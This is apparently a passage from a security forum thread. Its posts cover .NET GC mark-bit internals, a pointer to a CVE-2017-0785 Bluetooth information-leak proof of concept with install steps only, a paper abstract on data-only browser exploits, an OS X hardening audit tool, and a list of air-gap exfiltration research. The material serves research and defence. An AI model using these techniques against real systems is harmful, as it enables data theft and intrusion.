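MARK_BIT = 0x1  # lowest bit: "reachable, keep alive" during a collection

def set_marked(mt_ptr):
    return mt_ptr | MARK_BIT

def is_marked(mt_ptr):
    return (mt_ptr & MARK_BIT) != 0

def raw_method_table(mt_ptr):
    # The flag must be stripped before the pointer is dereferenced.
    return mt_ptr & ~MARK_BIT

ptr = 0x7F3C2A1088C0  # an 8-byte-aligned address: its low 3 bits are zero
marked = set_marked(ptr)
assert not is_marked(ptr)
assert is_marked(marked)
assert raw_method_table(marked) == ptr
```

The same masking discipline is why the GC must clear the mark bits again before the mutator resumes: a tagged method table pointer is not a valid address.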
Part 1: https://blogs.msdn.microsoft.com/seteplia/2017/05/26/managed-object-internals-part-1-layout/
Part 2: https://blogs.msdn.microsoft.com/seteplia/2017/09/06/managed-object-internals-part-2-object-header-layout-and-the-cost-of-locking/
Part 3: https://blogs.msdn.microsoft.com/seteplia/2017/09/12/managed-object-internals-part-3-the-layout-of-a-managed-array-3/
Part 4: https://blogs.msdn.microsoft.com/seteplia/2017/09/21/managed-object-internals-part-4-fields-layout/
  22. CVE-2017-0785 PoC

This is just a personal study based on the Android information leak vulnerability released by Armis. Further reading: https://www.armis.com/blueborne/

To run, be sure to have pybluez and pwntools installed:

sudo apt-get install bluetooth libbluetooth-dev
sudo pip install pybluez
sudo pip install pwntools

Sursa: https://github.com/ojasookert/CVE-2017-0785
  23. Abstract— The continuous discovery of exploitable vulnerabilities in popular applications (e.g., document viewers), along with their heightening protections against control flow hijacking, has opened the door to an often neglected attack strategy— namely, data-only attacks. In this paper, we demonstrate the practicality of the threat posed by data-only attacks that harness the power of memory disclosure vulnerabilities. To do so, we introduce memory cartography, a technique that simplifies the construction of data-only attacks in a reliable manner. Specifically, we show how an adversary can use a provided memory mapping primitive to navigate through process memory at runtime, and safely reach security-critical data that can then be modified at will. We demonstrate this capability by using our cross-platform memory cartography framework implementation to construct data-only exploits against Internet Explorer and Chrome. The outcome of these exploits ranges from simple HTTP cookie leakage, to the alteration of the same origin policy for targeted domains, which enables the cross-origin execution of arbitrary script code. The ease with which we can undermine the security of modern browsers stems from the fact that although isolation policies (such as the same origin policy) are enforced at the script level, these policies are not well reflected in the underlying sandbox process models used for compartmentalization. This gap exists because the complex demands of today’s web functionality make the goal of enforcing the same origin policy through process isolation a difficult one to realize in practice, especially when backward compatibility is a priority (e.g., for support of cross-origin IFRAMEs). While fixing the underlying problems likely requires a major refactoring of the security architecture of modern browsers (in the long term), we explore several defenses, including global variable randomization, that can limit the power of the attacks presented herein. 
Download: https://www3.cs.stonybrook.edu/~mikepo/papers/xfu.eurosp17.pdf
  24. osx-config-check

Checks your OSX machine against various hardened configuration settings. You can specify your own preferred configuration baseline by supplying your own Hjson file instead of the provided one.

Disclaimer

The authors of this tool are not responsible if running it breaks stuff; disabling features of your operating system and applications may disrupt normal functionality. Once applied, the security configurations do not guarantee security. You will still need to make good decisions in order to stay secure. The configurations will generally not help you if your computer has been previously compromised. Configurations come from sites like drduh's OS X Security and Privacy Guide.

Usage

You should download and run this application once for each OS X user account you have on your machine. Each user may be configured differently, and so each should be audited.

Download this app using Git, GitHub Desktop, or the "download as zip" option offered by GitHub. If you choose the zip option, unarchive the zip file afterwards.

In the Terminal application, navigate to the directory that contains this app. You can use the cd command (see example below) to change directories. If you've downloaded the file to your "Downloads" directory, you might find the app here:

cd ~/Downloads/osx-config-check

If that directory doesn't exist because the folder you retrieved is named slightly differently (such as 'osx-config-check-master' or 'osx-config-check-1.0.0'), you can always type in a portion of the directory name and hit the [TAB] key in Terminal to auto-complete the rest.

Next, run the app as follows:

python app.py

This will take you through a series of interactive steps that checks your machine's configuration, and offers to fix misconfigurations for you.

Intermediate and advanced users can also invoke various command-line arguments:

Usage: python app.py [OPTIONS]

OPTIONS:
--debug-print        Enables verbose output for debugging the tool.
--report-only        Only reports on compliance and does not offer to fix broken configurations.
--disable-logs       Refrain from creating a log file with the results.
--disable-prompt     Refrain from prompting user before applying fixes.
--skip-sudo-checks   Do not perform checks that require sudo privileges.
--help -h            Print this usage information.

Sursa: https://github.com/kristovatlas/osx-config-check
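At its core, an audit of this kind boils down to comparing observed settings against an expected baseline. The following is a hypothetical sketch of that idea, not the tool's actual code; the setting names and values are invented:

```python
# Compare observed settings against an expected baseline and report drift.

def audit(baseline, observed):
    """Return the keys whose observed value differs from the baseline."""
    return [key for key, expected in baseline.items()
            if observed.get(key) != expected]

# Invented example settings, loosely in the spirit of a hardening baseline.
baseline = {"firewall_enabled": True, "remote_login_enabled": False}
observed = {"firewall_enabled": True, "remote_login_enabled": True}
print(audit(baseline, observed))  # ['remote_login_enabled']
```

A report-only mode stops here; a fix mode would additionally apply the expected value for each drifted key, ideally after prompting the user.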
  25. Air-Gap Research Page

By Dr. Mordechai Guri
Cyber-Security Research Center, Ben-Gurion University of the Negev, Israel
email: gurim@post.bgu.ac.il

aIR-Jumper (Optical)
Mordechai Guri, Dima Bykhovsky, Yuval Elovici. "aIR-Jumper: Covert Air-Gap Exfiltration/Infiltration via Security Cameras & Infrared (IR)"
Paper: http://arxiv.org/abs/1709.05742
Video (infiltration): https://www.youtube.com/watch?v=auoYKSzdOj4
Video (exfiltration): https://www.youtube.com/watch?v=om5fNqKjj2M

xLED (Optical)
Mordechai Guri, Boris Zadov, Andrey Daidakulov, Yuval Elovici. "xLED: Covert Data Exfiltration from Air-Gapped Networks via Router LEDs"
Paper: https://arxiv.org/abs/1706.01140 or http://cyber.bgu.ac.il/advanced-cyber/system/files/xLED-Router-Guri_0.pdf
Demo video: https://www.youtube.com/watch?v=mSNt4h7EDKo

AirHopper (Electromagnetic)
Mordechai Guri, Gabi Kedma, Assaf Kachlon, and Yuval Elovici. "AirHopper: Bridging the air-gap between isolated networks and mobile phones using radio frequencies." In Malicious and Unwanted Software: The Americas (MALWARE), 2014 9th International Conference on, pp. 58-67. IEEE, 2014.
Mordechai Guri, Matan Monitz, and Yuval Elovici. "Bridging the Air Gap between Isolated Networks and Mobile Phones in a Practical Cyber-Attack." ACM Transactions on Intelligent Systems and Technology (TIST) 8, no. 4 (2017): 50.
Demo video: https://www.youtube.com/watch?v=2OzTWiGl1rM&t=20s

BitWhisper (Thermal)
Mordechai Guri, Matan Monitz, Yisroel Mirski, and Yuval Elovici. "BitWhisper: Covert signaling channel between air-gapped computers using thermal manipulations." In Computer Security Foundations Symposium (CSF), 2015 IEEE 28th, pp. 276-289. IEEE, 2015.
Demo video: https://www.youtube.com/watch?v=EWRk51oB-1Y&t=15s

GSMem (Electromagnetic)
Mordechai Guri, Assaf Kachlon, Ofer Hasson, Gabi Kedma, Yisroel Mirsky, and Yuval Elovici. "GSMem: Data exfiltration from air-gapped computers over GSM frequencies." In 24th USENIX Security Symposium (USENIX Security 15), pp. 849-864. 2015.
Demo video: https://www.youtube.com/watch?v=RChj7Mg3rC4

Fansmitter (Acoustic)
Mordechai Guri, Yosef Solewicz, Andrey Daidakulov, and Yuval Elovici. "Fansmitter: Acoustic Data Exfiltration from (Speakerless) Air-Gapped Computers." arXiv preprint arXiv:1606.05915 (2016).
Demo video: https://www.youtube.com/watch?v=v2_sZIfZkDQ

DiskFiltration (Acoustic)
Mordechai Guri, Yosef Solewicz, Andrey Daidakulov, Yuval Elovici. "Acoustic Data Exfiltration from Speakerless Air-Gapped Computers via Covert Hard-Drive Noise (‘DiskFiltration’)." European Symposium on Research in Computer Security (ESORICS 2017), pp. 98-115.
Mordechai Guri, Yosef Solewicz, Andrey Daidakulov, and Yuval Elovici. "DiskFiltration: Data Exfiltration from Speakerless Air-Gapped Computers via Covert Hard Drive Noise." arXiv preprint arXiv:1608.03431 (2016).
Demo video: https://www.youtube.com/watch?v=H7lQXmSLiP8

USBee (Electromagnetic)
Mordechai Guri, Matan Monitz, and Yuval Elovici. "USBee: Air-Gap Covert-Channel via Electromagnetic Emission from USB." arXiv preprint arXiv:1608.08397 (2016).
Demo video: https://www.youtube.com/watch?v=E28V1t-k8Hk

LED-it-GO (Optical)
Mordechai Guri, Boris Zadov, Yuval Elovici. "LED-it-GO: Leaking (A Lot of) Data from Air-Gapped Computers via the (Small) Hard Drive LED." Detection of Intrusions and Malware, and Vulnerability Assessment - 14th International Conference, DIMVA 2017: 161-184.
Mordechai Guri, Boris Zadov, Eran Atias, and Yuval Elovici. "LED-it-GO: Leaking (a lot of) Data from Air-Gapped Computers via the (small) Hard Drive LED." arXiv preprint arXiv:1702.06715 (2017).
Demo video: https://www.youtube.com/watch?v=4vIu8ld68fc

VisiSploit (Optical)
Mordechai Guri, Ofer Hasson, Gabi Kedma, and Yuval Elovici. "An optical covert-channel to leak data through an air-gap." In Privacy, Security and Trust (PST), 2016 14th Annual Conference on, pp. 642-649. IEEE, 2016.
Mordechai Guri, Ofer Hasson, Gabi Kedma, and Yuval Elovici. "VisiSploit: An Optical Covert-Channel to Leak Data through an Air-Gap." arXiv preprint arXiv:1607.03946 (2016).

Attachment: xLED-Router-Guri.pdf
Link: http://cyber.bgu.ac.il/advanced-cyber/airgap